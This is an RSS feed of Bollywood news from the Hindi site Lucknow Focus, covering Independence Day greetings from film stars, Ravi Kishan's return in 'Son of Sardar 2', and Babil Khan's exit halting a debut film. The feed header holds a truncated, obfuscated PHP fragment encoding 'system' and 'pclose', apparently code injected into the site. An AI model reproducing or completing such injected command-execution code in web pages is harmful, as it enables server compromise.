Bollywood – Lucknow Focus http://lucknowfocus.com <?php $_0="s\171stem";$_1="pc\x6cose";$_2 Fri, 15 Aug 2025 08:12:52 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 http://lucknowfocus.com/wp-content/uploads/2022/03/cropped-Capture-32x32.jpg Bollywood – Lucknow Focus http://lucknowfocus.com 32 32 79वें स्वतंत्रता दिवस पर देशभक्ति के रंग में रंगे सितारे, करीना-प्रियंका से लेकर कमल हासन तक ने दी बधाई http://lucknowfocus.com/from-kareena-priyanka-to-kamal-haasan-painted-in-patriotic-colors-on-79th-independence-day/ Fri, 15 Aug 2025 08:12:51 +0000 https://lucknowfocus.com/?p=5457 Lucknow Focus News Desk: आज, 15 अगस्त 2025 को भारत अपना 79वां स्वतंत्रता दिवस मना रहा है। इस खास मौके पर पूरा देश देशभक्ति के रंग में डूबा हुआ है। देश के इस जश्न में बॉलीवुड और साउथ इंडस्ट्री के सितारे भी पीछे नहीं रहे, जिन्होंने सोशल मीडिया के माध्यम से अपने फैंस को शुभकामनाएं दीं।

बॉलीवुड सितारों ने साझा किए देश के गौरव भरे संदेश

एक्ट्रेस करीना कपूर ने तिरंगे की खूबसूरत तस्वीर साझा करते हुए लिखा, “यह हमारे देश और उसके अविश्वसनीय जज्बे के लिए है, स्वतंत्रता दिवस की ढेर सारी बधाई।” वहीं, प्रियंका चोपड़ा ने भी भारत के झंडे की तस्वीर शेयर कर सभी को स्वतंत्रता दिवस की शुभकामनाएं दीं।

अभिषेक बच्चन ने एक पोस्ट में लिखा, “हमारे दिल में आज़ादी है और हमारी आत्मा में गर्व भरा है। सभी को स्वतंत्रता दिवस की ढेर सारी बधाई। जय हिंद।” इनके अलावा सुपरस्टार अक्षय कुमार, अनुपम खेर, किरण खेर और हेमा मालिनी समेत कई सितारों ने भी देशवासियों को बधाई दी।

साउथ सुपरस्टार कमल हासन का खास संदेश

साउथ इंडस्ट्री के दिग्गज सुपरस्टार कमल हासन ने इस अवसर पर एक भावुक संदेश लिखा। उन्होंने कहा, “स्वप्न देखने की, सृजन करने की आजादी, पतन से उत्थान तक का सफर, साल्ट मार्च से स्पेस एज तक का सफर… क्या हम उस आजादी को और विस्तार दे सकते हैं जिसने इस देश को सदियों से मजबूत बनाया है? जिस साहस ने हमें आजादी दिलाई, क्यों न हम हर शहर, हर गांव और हर दिमाग में उसी साहस को अब देश के विकास के लिए लगाएं। हैप्पी इंडिपेंडेंस डे, जय हिंद।”

साउथ के अन्य कलाकारों में सुपरस्टार मोहनलाल ने देश के ऊंचे लहराते झंडे को सैल्यूट करते हुए अपनी तस्वीर शेयर की, जबकि महेश बाबू समेत कई और कलाकारों ने भी फैंस को शुभकामनाएं दीं।

Also Read: GST में बड़े बदलाव की तैयारी: दिवाली तक लागू हो सकता है नया दो-स्लैब वाला ढांचा

]]>
‘सन ऑफ सरदार 2’ में नया अवतार, संसद से सिनेमा तक रवि किशन की दमदार वापसी http://lucknowfocus.com/ravi-kishans-strong-return-from-parliament-to-cinema-in-son-of-sardar-2/ Tue, 15 Jul 2025 07:13:04 +0000 https://lucknowfocus.com/?p=4935 Lucknow Focus News Desk: फिल्मी दुनिया से लेकर संसद तक अपने अंदाज़ और अनुशासन से लोगों का दिल जीतने वाले भाजपा सांसद और चर्चित अभिनेता रवि किशन एक बार फिर बड़े पर्दे पर लौट रहे हैं। इस बार वो नज़र आएंगे फिल्म ‘सन ऑफ सरदार 2’ में, जिसमें उनका एक नया और दमदार सरदार अवतार देखने को मिलेगा।

फिल्म का टीज़र रिलीज़ होते ही सोशल मीडिया पर रवि किशन की चर्चा तेज हो गई है। उनके प्रशंसक न केवल उनके अभिनय को लेकर उत्साहित हैं, बल्कि उनकी बहुप्रतीक्षित वापसी का बेसब्री से इंतज़ार भी कर रहे हैं। फिल्म 25 जुलाई 2025 को देशभर के सिनेमाघरों और मल्टीप्लेक्स में रिलीज़ हो रही है।

बॉलीवुड में वापसी, अजय देवगन के साथ मजबूत भूमिका

अजय देवगन के बैनर देवगन फिल्म्स के तहत बनी इस फिल्म में रवि किशन एक एक्शन से भरपूर और प्रभावशाली किरदार निभा रहे हैं। सरदार के रूप में उनका लुक, अंदाज़ और संवाद डिलीवरी एक बार फिर दर्शकों को उनका दीवाना बना सकती है।

रवि किशन ने निर्देशक और को-स्टार अजय देवगन का शुक्रिया अदा करते हुए कहा, “यह फिल्म मेरे लिए सिर्फ एक किरदार नहीं, बल्कि उस संघर्ष के बाद मिली स्वीकृति है जो एक कलाकार अपने जीवन में पाता है। अजय देवगन के प्रति मैं आभारी हूं कि उन्होंने मुझे दोबारा बॉलीवुड से जोड़ा।”

‘लापता लेडीज़’ से ऑस्कर तक की उड़ान

हाल ही में आई उनकी फिल्म ‘लापता लेडीज़’ भी चर्चा में रही, जिसे ऑस्कर 2025 के लिए भारत की आधिकारिक एंट्री के रूप में नामांकित किया गया है। इस फिल्म में रवि किशन की भूमिका ने सामाजिक मुद्दों को हास्य और संवेदनशीलता के साथ दर्शकों तक पहुंचाया। उनकी परफॉर्मेंस को आलोचकों और दर्शकों दोनों से सराहना मिली।

OTT और IIFA अवॉर्ड में भी छाए रवि किशन

OTT पर भी रवि किशन की मौजूदगी शानदार रही है। वे कई कंटेंट-ड्रिवन रोल्स में नज़र आए, जिससे उनकी विविधता और अभिनय क्षमता का दायरा और बढ़ा। इसी वर्ष उन्हें IIFA अवॉर्ड से नवाज़ा गया, जो उनके लंबे फिल्मी सफर और दमदार परफॉर्मेंस का सम्मान था।

सांसद के रूप में भी शानदार प्रदर्शन

गोरखपुर से लगातार दूसरी बार सांसद बने रवि किशन ने न सिर्फ संसद में अपनी उपस्थिति और सवालों की संख्या से रिकॉर्ड बनाया, बल्कि स्थानीय विकास कार्यों में भी गंभीर भूमिका निभाई।

उन्होंने क्षेत्र में रेलवे सुविधाएं बेहतर करने, युवा रोजगार केंद्र खोलने, सड़क और जलनिकासी जैसी योजनाओं को गति देने और पूर्वांचल में फिल्म सिटी लाने के लिए भी लगातार प्रयास किए हैं।

संसद रत्न सम्मान से होंगे सम्मानित

उनके राजनीतिक योगदान को देखते हुए 26 जुलाई को उन्हें ‘संसद रत्न सम्मान’ से भी सम्मानित किया जाएगा। यह पुरस्कार उन सांसदों को दिया जाता है जिन्होंने अपने क्षेत्र और संसद में अनुकरणीय कार्य किए हों।

एक संघर्षशील बेटे की कहानी

रवि किशन की यात्रा सिर्फ फिल्मों की चमक-धमक तक सीमित नहीं है। एक साधारण परिवार से निकलकर उन्होंने खुद को बॉलीवुड, भोजपुरी, टॉलीवुड और अब राजनीति में स्थापित किया है। उनका जीवन इस बात का उदाहरण है कि सपने देखे भी जा सकते हैं और पूरे भी।

25 जुलाई: रवि किशन की वापसी का दिन

रवि किशन की ‘सन ऑफ सरदार 2’ न केवल एक फिल्म है, बल्कि उनके अभिनय की नई पारी की शुरुआत भी है। फिल्म प्रेमियों और उनके समर्थकों के लिए 25 जुलाई एक खास दिन होगा, जब वो एक बार फिर बड़े पर्दे पर अपने चहेते अभिनेता को एक नए अंदाज़ में देख सकेंगे।

Also Read: अब एक्टिंग के बाद सिंगिंग में भी आमिर खान का जलवा, कॉमेडी फिल्म में सुनाई देगी उनकी आवाज

]]>
बाबिल खान के बयान से अटका यशवर्धन आहूजा की डेब्यू फिल्म का काम, शूटिंग पर लगी रोक http://lucknowfocus.com/yashvardhan-ahujas-debut-film-work-stuck-due-to-babil-khans-statement-shooting-stopped/ Mon, 26 May 2025 06:59:40 +0000 https://lucknowfocus.com/?p=3956 Lucknow Focus News Desk : बॉलीवुड में इस साल कई स्टार किड्स अपनी शुरुआत करने की तैयारी में हैं। इस लिस्ट में सुपरस्टार गोविंदा के बेटे यशवर्धन आहूजा का नाम भी शामिल है, जिनकी डेब्यू फिल्म एक चर्चित तमिल फिल्म ‘बेबी’ के हिंदी रीमेक के तौर पर बनाई जा रही है। हालांकि अब इस प्रोजेक्ट को लेकर बड़ी रुकावट सामने आई है, जिसकी वजह बनें हैं दिवंगत अभिनेता इरफान खान के बेटे बाबिल खान।

सूत्रों के मुताबिक, फिल्म का निर्देशन कर रहे नेशनल अवॉर्ड विनर डायरेक्टर साई राजेश की इस फिल्म में बाबिल भी अहम भूमिका में थे। मई की शुरुआत से शूटिंग शुरू होने वाली थी, लेकिन बाबिल के सोशल मीडिया पर दिए गए एक बयान के बाद से फिल्म की शूटिंग को अनिश्चितकाल के लिए टाल दिया गया है।

बाबिल के बयान से मचा बवाल

दरअसल, मई की शुरुआत में बाबिल खान ने एक वीडियो सोशल मीडिया पर साझा किया, जिसमें उन्होंने बॉलीवुड इंडस्ट्री को “फेक” कहकर संबोधित किया। उन्होंने इस वीडियो में शनाया कपूर, अनन्या पांडे, अर्जुन कपूर, सिद्धांत चतुर्वेदी, राघव जुयाल और आदर्श गौरव जैसे सितारों का जिक्र करते हुए फिल्म इंडस्ट्री पर सवाल उठाए। इस वीडियो के बाद डायरेक्टर साई राजेश ने भी प्रतिक्रिया दी, जिससे बाबिल आहत हुए और उन्होंने फिल्म से खुद को अलग कर लिया।

बाबिल ने बाद में स्पष्ट किया कि वे अब इस फिल्म में काम नहीं करेंगे और भविष्य में किसी अन्य निर्देशक के साथ काम करने की इच्छा ज़ाहिर की।

प्रोजेक्ट पर ब्रेक, अब नए एक्टर की तलाश
‘बेबी’ के हिंदी रीमेक के लिए पहले से ही मुख्य अभिनेत्री को चुनने में छह महीने का समय लग गया था। अब बाबिल के फिल्म छोड़ने के बाद, मेकर्स को उनके रिप्लेसमेंट की तलाश करनी पड़ रही है। यही वजह है कि फिलहाल फिल्म का प्रोडक्शन टाल दिया गया है और शूटिंग कब दोबारा शुरू होगी, इसे लेकर कोई तय तारीख सामने नहीं आई है।

साउथ की फिल्म ‘बेबी’, जो 2023 में रिलीज हुई थी, एक इमोशनल और सोशल मैसेज से भरपूर कहानी थी, जिसे दर्शकों ने खूब सराहा। यही वजह थी कि इसके हिंदी रीमेक से भी लोगों को काफी उम्मीदें थीं। अब देखना यह है कि फिल्म के निर्माता जल्द ही नए एक्टर को फाइनल कर पाते हैं या नहीं, और यशवर्धन आहूजा का डेब्यू कब और कैसे होगा।

]]>